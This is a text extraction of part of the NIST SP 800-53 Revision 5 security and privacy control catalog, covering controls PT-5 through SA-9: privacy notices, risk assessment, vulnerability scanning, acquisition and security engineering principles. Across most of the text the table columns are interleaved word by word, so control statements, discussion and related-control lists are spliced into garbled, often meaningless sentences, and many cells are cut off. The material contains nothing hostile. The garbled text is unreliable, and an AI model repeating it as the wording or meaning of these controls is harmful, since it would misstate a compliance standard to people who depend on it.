Present notice of personally identifiable information processing to individuals at a time and location Just-in-time notices at processed by the system inform orindividuals
organization. Organizations
of how organizations use privacy
processnotices to informidentifiable
their personally individuals inf PM-21.
[Assignment: organization-defined frequency]; about how, under what authority, and for what purpose their personally identifiable information is
PT-5(2) Privacy Notice | Privacy Act Statements Include Privacy Act statements on forms that collect information that will be maintained in a Privacy processed, If a federal as agency
well as asks individuals
other informationto supply such information that will become
as choices individuals might have part with
of a system
respectof to that PT-6.
PT-6 System of Records Notice For systems that process information that will be maintained in a Privacy Act system of records: records,
The PRIVACT requires that federal agencies publish a system of records notice in the Federalthe
the agency is required to provide a PRIVACT statement on the form used to collect Registe AC-3, PM-20, PT-2, PT-3, PT-5.
a. Draft system of records notices in accordance with OMB guidance and submit new and information or on a separate form that can be retained by the individual. The agency provides a
PT-6(1) System of Records Notice | Routine Uses Review all routine uses published in the system of records notice at [Assignment: organization- A PRIVACT
PRIVACT routine use
statement is a particular
in such circumstances kind of disclosure
regardless ofof a recordthe
whether outside of the federal
information agency
will be collected None.
significantly
defined all modified
frequency] to system
ensure of records notices
continued accuracy, to and
the OMB and appropriate
to ensure thatatroutine congressional
uses continue to be maintaining
PT-6(2) System of Records Notice | Exemption Rules Review
committees Privacy
for Act
advance exemptions
review; claimed for the system of records [Assignment: organization- The PRIVACTthe systemtwo
includes of records. A routinethat
sets of provisions use is an exception
allow federal agencies to the PRIVACT
to claim prohibition
exemptionson the None.
from
compatible
defined with thetopurpose
frequency] ensure for theywhich
remain theappropriate
informationand wasnecessary
collected.in accordance with law, that certain disclosure of a record in
requirements in a system of Inrecords
certainwithout the priorthese written consent of theagencies
individualtoto
PT-7 Specific Categories of Personally Identifiable Information Apply [Assignment: organization-defined processing conditions] for specific categories of personally iOrganizations
whom the record apply any the
pertains.
statute.
conditions
To qualify oras protections
a routine
circumstances,
that the
use, may be necessary provisions
mustfor
allow
bespecific categories of pers
IR-9, PT-2, PT-3, RA-3.
they have been promulgated as regulations, and that they are accurately described in the system of promulgate regulations to exempt a system of records fromdisclosure
select provisions forthe
of a purpose
PRIVACT. that
At is
a
PT-7(1) Specific Categories of Personally Identifiable Information | Social Security Numbers When
recordsa notice.
system processes Social Security numbers: Federal
minimum, laworganizations’
and policy establish PRIVACT specific
exemption requirements
regulations for include
organizations’ processing
the specific name(s) of ofSocial
any Securi IA-4.
PT-7(2) Specific Categories of Personally Identifiable Information | First Amendment Information (a) Eliminate
Prohibit unnecessary
the processing of collection,
informationmaintenance,
describing how andanyuseindividual
of Social Security
exercisesnumbers, and explore
rights guaranteed by The PRIVACT limits agencies’ ability to process information that describes how individuals exercise None.
alternatives
the First to their use
Amendment as a expressly
unless personal identifier;
authorized by statute
PT-8 Computer Matching Requirements When a system or organization processes information for theorpurpose
by the individual or unless
of conducting pertinent rights
a matching guaranteed
The PRIVACT by the requirements
establishes First Amendment. Organizations
for federal consult with
and non-federal the senior
agencies if theyagency
engageofficial for
in a matchPM-24.
to and within the scope of an authorized law enforcement activity.
program: privacy and legal counsel regarding these requirements.
RA-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: Risk assessment policy and procedures address the controls in the RA family that are implemented with PM-9, PS-8, SI-12.
RA-2 Security Categorization 1. [Selection (one or more): Organization-level; Mission/business
a. Categorize the system and information it processes, stores, and transmits; process-level; System-level] risk Security categories describe the potential adverse impacts or negative consequences to CM-8, MP-4, PL-2, PL-10, PL-11, PM-7, RA-3, RA-5, RA-7, RA-8, SA-8, SC-7, SC-38, SI-12.
assessment
b. Document policy that: categorization results, including supporting rationale, in the security plan organizational operations, organizational assets, and individuals if organizational information and
the security
RA-2(1) Security Categorization | Impact-level Prioritization Conduct an impact-level prioritization of organizational systems to obtain additional granularity on Organizations apply the high-water mark concept to each system categorized in accordance with None.
for the system;
system impact and
levels. systems199,are
FIPS assessments compromised
resulting in systems through a loss of
designated as confidentiality,
low impact, integrity,
moderate or availability.
impact, Security
RA-3 Risk Assessment a. Conduct a risk assessment, including: Risk
categorization is consider
also a type threats,
of asset vulnerabilities,
loss characterizationlikelihood, in and impact
systems toor
security
high impact.
organizational
engineering processes CA-3, CA-6, CM-4, CM-13, CP-6, CP-7, IA-8, MA-5, PE-3, PE-8, PE-18, PL-2, PL-10, PL-11,
1. Identifying threats to and vulnerabilities in the system; Organizations
operations and that
assets,desire additionalother
individuals, granularity in the system
organizations, and theimpact
Nation. designations
Risk for risk-based
assessments also PM-8, PM-9,PM-17,
PM-28,PM-30,
PT-2, PT-7,
RA-3(1) Risk Assessment | Supply Chain Risk Assessment (a) Assess supply chain risks associated with [Assignment: organization-defined systems, system Supply chain-related
decision-making, events include disruption, useinto
of defective components, insertion of counterfeits, RA-2, RA-9, SR-2.RA-2, RA-5, RA-7, SA-8, SA-9, SC-38, SI-12.
components, consider risk fromcan further
external partition
parties, the systems
including contractors sub-categories
who operate systems of the initial system
on behalf of the
RA-3(2) Risk Assessment | Use of All-source Intelligence Use all-sourceand system services];
intelligence to assist in and
the analysis of risk. Organizationsindividuals
organization, employ all-source who access intelligence to inform
organizational engineering,
systems, serviceacquisition,
providers, and andoutsourcing
risk None.
RA-3(3) Risk Assessment | Dynamic Threat Awareness management decisions. All-source intelligence
Determine the current cyber threat environment on an ongoing basis using [Assignment: organizatio The threat awareness information that is gathered feeds into the organization’s information security AT-2. consists of information derived from all available
sources, including publicly available or open-source information, measurement and signature
RA-3(4) Risk Assessment | Predictive Cyber Analytics Employ the following advanced automation and analytics capabilities to predict and identify risks to A properly resourced
intelligence, Security Operations
human intelligence, Center (SOC)
signals intelligence, and orimagery
Computer Incident Response
intelligence. All-sourceTeam (CIRT) None.
RA-4 Risk Assessment Update [Assignment: organization-defined
[Withdrawn: Incorporated into RA-3.] systems or system components]: [Assignment: organization- may be overwhelmed by the volume of information generated by the proliferation of security tools
defined advanced automation and analytics capabilities]. and appliances unless it employs advanced automation and analytics to analyze the data. Advanced
RA-5 Vulnerability Monitoring and Scanning a. Monitor and scan for vulnerabilities in the system and hosted applications [Assignment: Security
automation categorization
and analytics of capabilities
informationare andtypically
systemssupported
guides theby frequency and comprehensiveness
artificial intelligence concepts, of CA-2, CA-7, CA-8, CM-2, CM-4, CM-6, CM-8, RA-2, RA-3, SA-11, SA-15, SC-38, SI-2, SI-3, SI-
RA-5(1) Vulnerability Monitoring and Scanning | Update Tool Capability organization-defined
[Withdrawn: Incorporated frequency and/or randomly in accordance with organization-defined process] vulnerability monitoring (including scans). Organizations determine the required vulnerability
into RA-5.] 4, SI-7, SR-11.
and when new vulnerabilities potentially affecting the system are identified and reported; monitoring for system components, ensuring that the potential sources of vulnerabilities—such as
RA-5(2) Vulnerability Monitoring and Scanning | Update Vulnerabilities to Be Scanned Update the system vulnerabilities to be scanned [Selection (one or more): [Assignment: organization-Due to the complexity
infrastructure components of modern software,routers,
(e.g., switches, systems,guards, and other factors,
sensors), new vulnerabilities
networked are discovere
printers, scanners, SI-5.
RA-5(3) Vulnerability Monitoring and Scanning | Breadth and Depth of Coverage Define the breadth and depth of vulnerability scanning coverage. The breadth of vulnerability scanning coverage can be expressed as a percentage of components None.
RA-5(4) Vulnerability Monitoring and Scanning | Discoverable Information Determine information about the system that is discoverable and take [Assignment: organization-defiwithin the system,
Discoverable informationby the includes
particularinformation
types of systems, by the criticality
that adversaries of systems,
could obtain without or by the number or
compromising AU-13, SC-26.
of vulnerabilities to be checked. Conversely, the depth of vulnerability scanning coverage can be
RA-5(5) Vulnerability Monitoring and Scanning | Privileged Access Implement privileged access authorization to [Assignment: organization-defined system In certain situations,
expressed as the levelthe of nature
the systemof the vulnerability
design that thescanning
organization may intends
be moretointrusive,
monitor or the system None.
(e.g.,
RA-5(6) Vulnerability Monitoring and Scanning | Automated Trend Analyses components]
Compare for [Assignment:
the results of multipleorganization-defined
vulnerability scans using vulnerability scanning
[Assignment: activities].
organization-defined component
Using automated that ismechanisms
the subject of to the
analyze scanning
multiplemayvulnerability
contain classified scans or controlled
over time canunclassified
help determine None.
automated information, suchvulnerabilities
as personally and identifiable
identifyinformation. Privileged access authorization to selected
RA-5(7) Vulnerability Monitoring and Scanning | Automated Detection and Notification of Unauthorized [Withdrawn:mechanisms].
Incorporated into CM-8.] trends in system patterns of attack.
system components facilitates more thorough vulnerability scanning and protects the sensitive
RA-5(8) Components
Vulnerability Monitoring and Scanning | Review Historic Audit Logs Review historic audit logs to determine if a vulnerability identified in a [Assignment: organization-d Reviewing historic audit logs to determine if a recently detected vulnerability in a system has been pr AU-6, AU-11.
RA-5(9) Vulnerability Monitoring and Scanning | Penetration Testing and Analyses [Withdrawn: Incorporated into CA-8.]
RA-5(10) Vulnerability Monitoring and Scanning | Correlate Scanning Information Correlate the output from vulnerability scanning tools to determine the presence of multi- An attack vector is a path or means by which an adversary can gain access to a system in order to None.
RA-5(11) Vulnerability Monitoring and Scanning | Public Disclosure Program vulnerability
Establish and multi-hop
a public attack vectors.
reporting channel for receiving reports of vulnerabilities in organizational systems The deliver malicious
reporting code is
channel orpublicly
exfiltrate information.
discoverable and Organizations
contains clear canlanguage
use attack trees to show
authorizing how
good-faith None.
and system components. hostile
research activities
and theby adversaries
disclosure interact and combine
of vulnerabilities to the to produce adverse impacts or negative
RA-6 Technical Surveillance Countermeasures Survey Employ a technical surveillance countermeasures survey at [Assignment: organization-defined A technical
consequences surveillance
to systems countermeasures
and organizations. survey
Such aorganization.
isinformation,
service provided The organization
together bywith
qualified does
personnel
correlated
not to
data from None.
locations] [Selection (one or more): [Assignment: organization-defined frequency]; when the condition
detect the its authorization
presence of on an surveillance
technical expectation devices of indefiniteand non-disclosure
hazards and to to the public
identify technical by thesecurity
RA-7 Risk Response Respond to findings from security and privacy assessments, monitoring, and audits in accordance with Organizations
reporting entity have many optionsafor responding to riskto including mitigating risk byvulnerability.
implementing newCA-5, c IR-9, PM-4, PM-28, RA-2, RA-3, SR-2.
following events or indicators occur: [Assignment: organization-defined events or indicators]]. weaknesses thatbut could may berequest
used in the specific
conduct timeofperiod
a technical properly remediate
penetration of thethe surveyed facility.
RA-8 Privacy Impact Assessments Conduct privacy impact assessments for systems, programs, or other activities before: A privacy impact
Technical surveillance assessment is an analysis
countermeasures of howalso
surveys personally
provide identifiable
evaluations information
of the technical is handled
securityto CM-4, CM-9, CM-13, PT-2, PT-3, PT-5, RA-1, RA-2, RA-3, RA-7.
RA-9 Criticality Analysis a. Developing
Identify criticalorsystem
procuring information
components andtechnology
functions by that processesapersonally
performing identifiable
criticality analysis for [Assignmen ensure that handling
Not all system components,conforms to applicable
functions, privacy
or services requirements,
necessarily require determine
significant the privacy risks
protections. For CP-2, PL-2, PL-8, PL-11, PM-1, PM-11, RA-2, SA-8, SA-15, SA-20, SR-5.
information; and associatedcriticality
example, with an information is a system or of
activity,
supplyand evaluate ways to mitigate privacythe risks. A
RA-10 Threat Hunting a. Establish and maintain a cyber threat hunting capability to: Threat
privacyhunting is ananalysis
impactofassessment active means key tenet
is both of ancyberanalysisdefense chain
and ainformal
risk management
contrast to traditional
document that
and informs
protection
details the and measures,
process and s CA-2, CA-7, CA-8, RA-3, RA-5, RA-6, SI-4.
1. Develop,
Search fordocument,
indicators and of compromise prioritization protection activities. The identification of critical system components functions
SA-1 Policy and Procedures a. disseminateintoorganizational
[Assignment: systems; and
organization-defined personnel or roles]: considers
System and services acquisition
applicable laws, executive policy and procedures
orders, regulations, address
directives, the controls
policies, in the SA family
standards, systemthat are PM-9, PS-8, SA-8, SI-12.
SA-2 Allocation of Resources 1. [Selection (one or more): Organization-level; Mission/business process-level; System-level]
a. Determine the high-level information security and privacy requirements for the system or system Resource allocation for information security and privacy includes funding for system and services acqPL-7, PM-3, PM-11, SA-9, SR-3, SR-5.
system
service and
in services
mission and acquisition
business policy that:
SA-3 System Development Life Cycle a. Acquire, develop, and manageprocess
the systemplanning;
using [Assignment: organization-defined system A system development life cycle process provides the foundation for the successful development, AT-3, PL-8, PM-7, SA-4, SA-5, SA-8, SA-11, SA-15, SA-17, SA-22, SR-3, SR-4, SR-5, SR-9.
SA-3(1) System Development Life Cycle | Manage Preproduction Environment development
Protect systemlife cycle] that incorporates
preproduction environments information
commensurate security andrisk
with privacy considerations;
throughout the system developmeimplementation,
The preproduction and operation ofincludes
environment organizational
development, systems. test,The andintegration
integration of environments.
security and privacy The progrCM-2, CM-4, RA-3, RA-9, SA-4.
considerations early in the system development life cycle is a foundational principle of systems
SA-3(2) System Development Life Cycle | Use of Live or Operational Data (a) Approve, document, and control the use of live data in preproduction environments for the Live dataengineering
security is also referred and to as operational
privacy engineering. data. ToTheapply usethe of required
live or operational
controls withindata inthe preproduction
system PM-25, RA-3.
SA-3(3) System Development Life Cycle | Technology Refresh system,
Plan for system component,
and implement or systemrefresh
a technology service; and
schedule for the system throughout the system developm Technology refresh planning may encompass hardware, software, firmware, processes, personnel skillMA-6.
SA-4 Acquisition Process Include the following requirements, descriptions, and criteria, explicitly or by reference, using Security and privacy functional requirements are typically derived from the high-level security and CM-6, CM-8, PS-7, SA-3, SA-5, SA-8, SA-11, SA-15, SA-16, SA-17, SA-21, SR-3, SR-5.
SA-4(1) Acquisition Process | Functional Properties of Controls [Selection
Require the(one or more):
developer standardized
of the contract
system, system language; or
component, [Assignment:
system service organization-defined privacy requirements
to provide a description Functional properties described
of securityinand SA-2. The derived
privacy controlsrequirements include security
describe the functionality (i.e.,and privacy
security or None.
contract language]]
of the functional in the acquisition
properties contract forimplemented.
the system, system component, or system capabilities, functions, and mechanisms. Strength requirements associated with suchand capabilities,
SA-4(2) Acquisition Process | Design and Implementation Information for Controls Require
service: the developer of theofsystem,
the controls
system tocomponent,
be or system service to provide design and functions, privacy capability,
Organizations andmay
functions, or mechanisms)
require different
mechanisms include levels of
degree
visible
ofdetail inatthe
correctness,
thedocumentation
interfaces
completeness,
of theforcontrols
the design
resistance
specifically None.
and
to tampering or
implementation information for the controls that includes: [Selection (one or more): security- exclude functionality
implementation of and data
controls in structures
organizational internal
systems,to the operation
system of the controls.
components, or system services
SA-4(3) Acquisition Process | Development Methods, Techniques, and Practices Require the developer of the system, system component, or system service to demonstrate the use Following a system development life cycle that includes state-of-the-practice software development None.
relevant
of a system external system interfaces;
development high-levelthatdesign; low-level design; source code or hardware based on mission
systemsand business methods,
requirements, requirements forprivacy
resiliency and trustworthiness, and
SA-12 Supply Chain Protection [Withdrawn:
schematics; Incorporatedlife
[Assignment: intocycle process
SR Family.]
organization-defined
includes:
design and implementation information]] at
methods,
requirements
engineering systems security and engineering methods, and
quality controlfor analysis helps
processes and testing.
to reduce Systems can be and
the number partitioned
severityinto multiple
of latent errorssubsystems.
within systems, Each
SA-4(5) Acquisition Process | System, Component, and Service Configurations Require the developer of the system, system component, or system service to: Examples of security configurations
system components, and system services. includeReducing
the U.S. the Government
number and Configuration
severity of Baseline
such errors (USGCB),
reduces None.
SA-4(6) Acquisition Process | Use of Information Assurance Products (a) Employ
(a) Deliver the onlysystem,
governmentcomponent, or service
off-the-shelf with [Assignment:
or commercial organization-defined
off-the-shelf securityand
information assurance Security
Commercial Technical Implementation
off-the-shelf Guidesinformation
IA or IA-enabled (STIGs), andtechnology
any limitations on functions,
products ports, classif SC-8, SC-12, SC-13.
used to protect
configurations]
information implemented; and NSA-approved protocols, and services. Security characteristics can include requiring that default passwords have
SA-4(7) Acquisition Process | NIAP-approved Protection Profiles (a) Limit the assurance-enabled
use of commerciallyinformation technologyassurance
provided information products that compose an assurance-
and information See NIAP CCEVS for additional information on NIAP. See NIST CMVP for additional information on FIPIA-7, SC-12, SC-13.
solution to
enabled protect classified
information technologyinformation
products when
to the products
those networksthat usedhave
to transmit
been the information
successfully are been changed.
evaluated
SA-4(8) Acquisition Process | Continuous Monitoring Plan for Controls Require
at a lower theclassification
developer oflevel the than
system,thesystem component,
information being or system service
transmitted; and to produce a plan for contThe objective of continuous monitoring plans is to determine if the planned, required, and deployed CA-7.
against a National Information Assurance partnership (NIAP)-approved Protection Profile for a
SA-4(9) Acquisition Process | Functions, Ports, Protocols, and Services in Use Require technology
specific the developer type,of if
the system,
such system
a profile component,
exists; and or system service to identify the functions, pThe identification of functions, ports, protocols, and services early in the system development life cy CM-7, SA-9.
SA-4(10) Acquisition Process | Use of Approved PIV Products Employ only information technology products on the FIPS 201-approved products list for Personal Iden Products on the FIPS 201-approved products list meet NIST requirements for Personal Identity VerificIA-2, IA-8, PM-9.
SA-4(11) Acquisition Process | System of Records Include [Assignment: organization-defined Privacy Act requirements] in the acquisition contract for t When, by contract, an organization provides for the operation of a system of records to accomplish an PT-6.
SA-4(12) Acquisition Process | Data Ownership (a) Include organizational data ownership requirements in the acquisition contract; and Contractors who operate a system that contains data owned by an organization initiating the None.
SA-5 System Documentation (b) Require
a. Obtain orall data toadministrator
develop be removed from the contractor’s
documentation for thesystem
system,and returned
system to the organization
component, or system contract have policies and
System documentation procedures
helps personnelinunderstand
place to remove the data from their
the implementation systems and/or
and operation returnOrgan
of controls. CM-4, CM-6, CM-7, CM-8, PL-2, PL-4, PL-8, PS-2, SA-3, SA-4, SA-8, SA-9, SA-10, SA-11, SA-
within
service [Assignment:
that describes: organization-defined time frame]. the data in a time frame defined by the contract. 15, SA-16, SA-17, SI-12, SR-3.
SA-12(1) Supply Chain Protection | Acquisition Strategies / Tools / Methods [Withdrawn: Moved to SR-5.]
SA-12(10) Supply Chain Protection | Validate as Genuine and Not Altered [Withdrawn: Moved to SR-4(3).]
SA-12(11) Supply Chain Protection | Penetration Testing / Analysis of Elements, Processes, and Actors [Withdrawn: Moved to SR-6(1).]
SA-12(12) Supply Chain Protection | Inter-organizational Agreements [Withdrawn: Moved to SR-8.]
SA-12(13) Supply Chain Protection | Critical Information System Components [Withdrawn: Incorporated into MA-6 and RA-9.]
SA-12(14) Supply Chain Protection | Identity and Traceability [Withdrawn: Moved to SR-4(1) and SR-4(2).]
SA-12(15) Supply Chain Protection | Processes to Address Weaknesses or Deficiencies [Withdrawn: Incorporated into SR-3.]
SA-8 Security and Privacy Engineering Principles Apply the following systems security and privacy engineering principles in the specification, design Systems security and privacy engineering principles are closely related to and implemented PL-8, PM-7, RA-2, RA-3, RA-9, SA-3, SA-4, SA-15, SA-17, SA-20, SC-2, SC-3, SC-32, SC-39,
SA-8(1) Security and Privacy Engineering Principles | Clear Abstractions Implement the security design principle of clear abstractions. throughout
The principlethe of system development
clear abstractions life that
states cyclea(seesystemSA-3).
hasOrganizations
simple, well-defined can apply systemsand
interfaces security SR-2,
None.SR-3, SR-4, SR-5.
and privacy
functions engineering
that provide a principles
consistent to
andnew systems
intuitive under
view of development or to systems is undergoing
SA-8(2) Security and Privacy Engineering Principles | Least Common Mechanism Implement the security design principle of least common mechanism in [Assignment: organization- The principle
upgrades. For of least common
existing systems, mechanism
organizations states
applythat thethe
systems
data and
amount
security
how
of and
mechanism the
privacy
datacommon managed.
engineering to more The None.
defined systems or system components]. clarity,
than onesimplicity,
user and necessity,
dependedand sufficiency
on by all users of the systemPOPEK74.
isfundamental
minimized interfaces— combinedminimization
Mechanism with a precise
SA-8(3) Security and Privacy Engineering Principles | Modularity and Layering Implement the security design principles of modularity and layering in [Assignment: organization-d The principles
definition of modularity
of different
their functional and layering
behavior—promotes are easefrom across
of analysis, system
inspection,engineering
and testingdisciplines.
as wellaas SC-2, SC-3.
Modu
implies that components of a system refrain using the same mechanism to access
SA-8(4) Security and Privacy Engineering Principles | Partially Ordered Dependencies Implement the security design principle of partially ordered dependencies in [Assignment: The principle
system resource.of partially ordered
Every shared dependencies
mechanism states athat
(especially the synchronization,
mechanism involving shared calling, and other None.
variables)
SA-8(5) Security and Privacy Engineering Principles | Efficiently Mediated Access organization-defined systems or system of
Implement the security design principle components].
efficiently mediated access in [Assignment: organization dependencies in the system are partially ordered. A fundamental
The principle of efficiently mediated access states that policy enforcement mechanisms utilize concept in system design is the l AC-25.
layering, whereby the system is organized into well-defined, functionally related modules or
SA-8(6) Security and Privacy Engineering Principles | Minimized Sharing Implement the security design principle of minimized sharing in [Assignment: organization-defined The principle of
components. The minimized
layers aresharing
linearlystates
ordered thatwith no computer
respect toresourceinter-layer is shared betweensuch
dependencies, system thatcompone
SC-31.
SA-8(7) Security and Privacy Engineering Principles | Reduced Complexity Implement the security design principle of reduced complexity in [Assignment: organization-defined The principle of reduced complexity states that the system design is as simple and small as possible. None.
SA-8(8) Security and Privacy Engineering Principles | Secure Evolvability systems or system
Implement components].
the security design principle of secure evolvability in [Assignment: organization-defined A small and simple design is more understandable, more analyzable, and
The principle of secure evolvability states that a system is developed to facilitate the maintenance CM-3. less prone to error. The
reduced complexity principle applies to any aspect of a system, but it has particular importance for
SA-8(9) Security and Privacy Engineering Principles | Trusted Components Implement the security design principle of trusted components in [Assignment: organization- The principle
security due to ofthe
trusted components
various states thatto
analyses performed a component
obtain evidence is trustworthy
about theto at least asecurity
emergent level None.
SA-8(10) Security and Privacy Engineering Principles | Hierarchical Trust defined systems or system
Implement the security components].
design principle of hierarchical trust in [Assignment: organization-defined commensurate
The principle of with the security
hierarchical trustdependencies
for components it supports
builds on(i.e., how much
the principle ofittrusted
is trusted to perform None.
components
systems or system components]. its
andsecurity functions
states that the by other
security components).
dependencies in This principle
a system willtheenables
form the composition
a partial ordering of components
if they preserve
SA-8(11) Security and Privacy Engineering Principles | Inverse Modification Threshold Implement the security design principle of inverse modification threshold in [Assignment: The principle
suchprinciple of inverse
that trustworthiness modification threshold
is not inadvertently builds
diminishedon principle
and the trust of trusted
is notfor components
consequently and None.
organization-defined systems the of trusted components. and The partial ordering provides the basis trustworthiness
SA-8(12) Security and Privacy Engineering Principles | Hierarchical Protection Implement the security designorprinciple
system of
components].
hierarchical protection in [Assignment: organization- the principle
The principle
reasoning
of
or anof hierarchical
hierarchicalcase
assurance
trust
protection states
(assurance states that
that
argument)
the degree
a component
when
of protection
need not
composing
provided
be protected
a secure
to a component
systemfrom from more None.
defined systems or system components]. is commensurate
trustworthy with its trustworthiness.
components. In the degenerate As the trust
case of the placed
most in a component
trusted component, increases,
it the itself
protects
SA-8(13) Security and Privacy Engineering Principles | Minimized Security Elements Implement the security design principle of minimized security elements in [Assignment: The principle
protection of minimized
against security
unauthorized elements states
modification the that the system alsodoes not have extraneous degree. None.
organization-defined systems from all components.
other components. For example, if anof component
operating system kernel increases
is deemed to the
the same
most
SA-8(14) Security and Privacy Engineering Principles | Least Privilege Implement the security designor system of
principle components].
least privilege in [Assignment: organization-defined syst trusted
The principle
trustworthy
The principle
of least privilege
component states
in acomplexity
system,
ofthat
minimized
then each security
system
it protects
elements
component
itself from
has
is two
allocated
all untrusted
aspects: the
sufficient
applications
overall
privileges
it
cost AC-6, CM-7.
of security
to analysis and the ofnosecurity analysis. Trusted components are generally
SA-8(15) Security and Privacy Engineering Principles | Predicate Permission Implement the security design principle of predicate permission in [Assignment: organization-defin Theaccomplish
principle
costlier ofitspredicate
specified functions but
permission states more.
that Applying
thesystem
the principle
designers
rigor ofconsider
of least privilege
requiring limitsauthori
multiple the AC-5.
scope oftothe
construct
component’s and implement,
actions, whichowing has to two increased
desirable effects: development
the security impact processes.
of a failure,
SA-8(16) Security and Privacy Engineering Principles | Self-reliant Trustworthiness Implement the security design principle of self-reliant trustworthiness in [Assignment: organization- The principle of self-reliant trustworthiness states that systems minimize
corruption, or misuse of the component will have a minimized security impact, and the security their reliance on other None.
SA-8(17) Security and Privacy Engineering Principles | Secure Distributed Composition defined systems
Implement or system
the security components].
design principle of secure distributed composition in [Assignment: systems
The for their
principle own trustworthiness.
of secure distributed compositionA systemstates is trustworthy by default, and
that the composition any connection to an None.
of distributed
organization-defined systems external entity is used to supplement its function. If policy
a system were required to maintain a that
SA-8(18) Security and Privacy Engineering Principles | Trusted Communications Channels Implement the security designor system of
principle components].
trusted communications channels in [Assignment: organi components
The principlewith
connection
that enforce the same
of trusted communication system security
channels states result
that when in a system that
composing a system enforces where there isSC-8, SC-12, SC-13.
policy at least as another
well as theexternal entity
individual in order to
components maintain
do. Manyits of trustworthiness,
the design principles thenfor that system
secure
systems deal with how components can or should interact. The need to create or enable a

9 of 2021-01-21
 NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

SA-8(19) Security and Privacy Engineering Principles | Continuous Protection Implement the security design principle of continuous protection in [Assignment: organization-defi The principle of continuous protection states that components and data used to enforce the AC-25.
SA-8(20) Security and Privacy Engineering Principles | Secure Metadata Management Implement the security design principle of secure metadata management in [Assignment: security policyofhave
The principle secure uninterrupted
metadata management protection that is consistent
states that metadata with the are security
first classpolicy
objects andwiththe None.
organization-defined systems security toarchitecture assumptions. theNo assurances that thecomplete
system can provide of theinformation
confidentiality,
SA-8(21) Security and Privacy Engineering Principles | Self-analysis Implement the security designor system of
principle components].
self-analysis in [Assignment: organization-defined system respect The principle
integrity,
security
availability,
policy
of self-analysis
and
when states
privacy
policy
that requirescomponent
a system
protections for its
either
design is ableprotection
capability tocanassess
be its internal
made if there state
are
orand CA-7.
gaps
that the security subsystem be self-protecting. The principle of secure metadata management is
SA-8(22) Security and Privacy Engineering Principles | Accountability and Traceability Implement the security design principle of accountability and traceability in [Assignment: organizat driven The principle
by the of accountability
recognition that aand traceability
system, subsystem, statesorthat it is possible
component cannotto trace
achieve security-relevant
self-protectiona AC-6, AU-2, AU-3, AU-6, AU-9, AU-10, AU-12, IA-2, IR-4.
SA-8(23) Security and Privacy Engineering Principles | Secure Defaults Implement the security design principle of secure defaults in [Assignment: organization-defined sys The principle of secure defaults states that the default configuration of a system (including its CM-2, CM-6, SA-4.
SA-8(24) Security and Privacy Engineering Principles | Secure Failure and Recovery Implement the security design principle of secure failure and recovery in [Assignment: organization The constituent
principlesubsystems,
of secure failure components,
and recovery and mechanisms)
states that neither reflectsa afailure
restrictive and conservative
in a system function or CP-10, CP-12, SC-7, SC-8, SC-24, SI-13.
enforcementnor
mechanism of any
security
recoverypolicy. The principle
action in response of secure
to failuredefaults
leads applies
to a to the of
violation initial (i.e., policy.
security default) The
SA-8(25) Security and Privacy Engineering Principles | Economic Security Implement the security design principle of economic security in [Assignment: organization-defined configuration The principle of of economic
a system securityasstates that security mechanisms are not of costlier
accessthan the potentia RA-3.
principle of secure failure as andwellrecovery to the security
parallels theengineering
principle ofand design
continuous protection control
to ensureand
SA-8(26) Security and Privacy Engineering Principles | Performance Security Implement the security design principle of performance security in [Assignment: organization-defin The that principle
a systemof performance
is capable security(within
of detecting states limits)
that security
actual mechanisms
and impending arefailure
constructed
at any so thatofthey
stage its SC-12, SC-13, SI-2, SI-7.
SA-8(27) Security and Privacy Engineering Principles | Human Factored Security Implement the security design principle of human factored security in [Assignment: organization- do
Thenot degrade
principle of system
human performance
factored security unnecessarily.
states thatStakeholder
the user interface and system designfunctions
for security requirements and None.
defined systems or system components]. for performance andissecurity
intuitive,are precisely articulated and prioritized. For theactionssystemthat affect such
SA-8(28) Security and Privacy Engineering Principles | Acceptable Security Implement the security design principle of acceptable security in [Assignment: organization-defined supporting The principle
implementation
services
of acceptable
to meet its securitydesign
user-friendly,
requires that
requirements
and theprovides
level feedback
of privacy for
anduser performance that(i.e.,
the None.
systems or system components]. policy and its enforcement. The mechanisms thatand enforcebe found
security acceptable
policy are to not
stakeholders
intrusive to the
SA-8(29) Security and Privacy Engineering Principles | Repeatable and Documented Procedures Implement the security design principle of repeatable and documented procedures in [Assignment: system user and
provides
The principle
are
is consistent
of repeatable
designed not toandwith
degrade
the users’ expectations.
documenteduser procedures
efficiency.
The perception
states
Security that the
policy
of personal
techniques
enforcement andprivacy
mechanismsmethods mayemplo
also CM-1, SA-1, SA-10, SA-11, SA-15, SA-17, SC-1, SI-1.
affect user behavior, morale, and effectiveness. Based on the organizational privacy policy and the
SA-8(30) Security and Privacy Engineering Principles | Procedural Rigor Implement the security design principle of procedural rigor in [Assignment: organization-defined The principle
system design,ofusersprocedural
shouldrigor be able states that thetheir
to restrict rigoractions
of a system life cycle
to protect theirprocess
privacy.isWhencommensurate
systems None.
SA-8(31) Security and Privacy Engineering Principles | Secure System Modification systems
Implement or system components].
the security design principle of secure system modification in [Assignment: organization with its intended
The principle trustworthiness.
of secure system modificationProcedural rigorthat
states definessystemthe modification
scope, depth,maintains and detailsystem of the securityCM-3, CM-4.
system life cycle procedures. Rigorous system life cycle procedures contribute to the assurance that
SA-8(32) Security and Privacy Engineering Principles | Sufficient Documentation Implement the security design principle of sufficient documentation in [Assignment: organization-d the The system
principle is of sufficient
correct and freedocumentation
of unintended states that organizational
functionality in severalpersonnel
ways. First,with theresponsibilities
procedures AT-2, AT-3, SA-5.
SA-8(33) Security and Privacy Engineering Principles | Minimization Implement the privacy principle of minimization using [Assignment: organization-defined processes]. The principle of minimization states that organizations should only process personally identifiable in PE-8, PM-25, SC-42, SI-12.
SA-9 External System Services a. Require that providers of external system services comply with organizational security and External system services are provided by an external provider, and the organization has no direct conAC-20, CA-3, CP-2, IR-4, IR-7, PL-10, PL-11, PS-7, SA-2, SA-4, SR-3, SR-5.
SA-9(1) External System Services | Risk Assessments and Organizational Approvals privacy
(a) Conductrequirements and employ
an organizational the following
assessment of riskcontrols: [Assignment:
prior to the acquisitionorganization-defined
or outsourcing of Information security services include the operation of security devices, such as firewalls or key managCA-6, RA-3, RA-8.
controls];
information security
SA-9(2) External System Services | Identification of Functions, Ports, Protocols, and Services Require providers of services;
the followingand external system services to identify the functions, ports, protocols Information from external service providers regarding the specific functions, ports, protocols, and serCM-6, CM-7.
SA-9(3) External System Services | Establish and Maintain Trust Relationship with Providers Establish, document, and maintain trust relationships with external service providers based on the folTrust relationships between organizations and external service providers reflect the degree of confideSR-2.
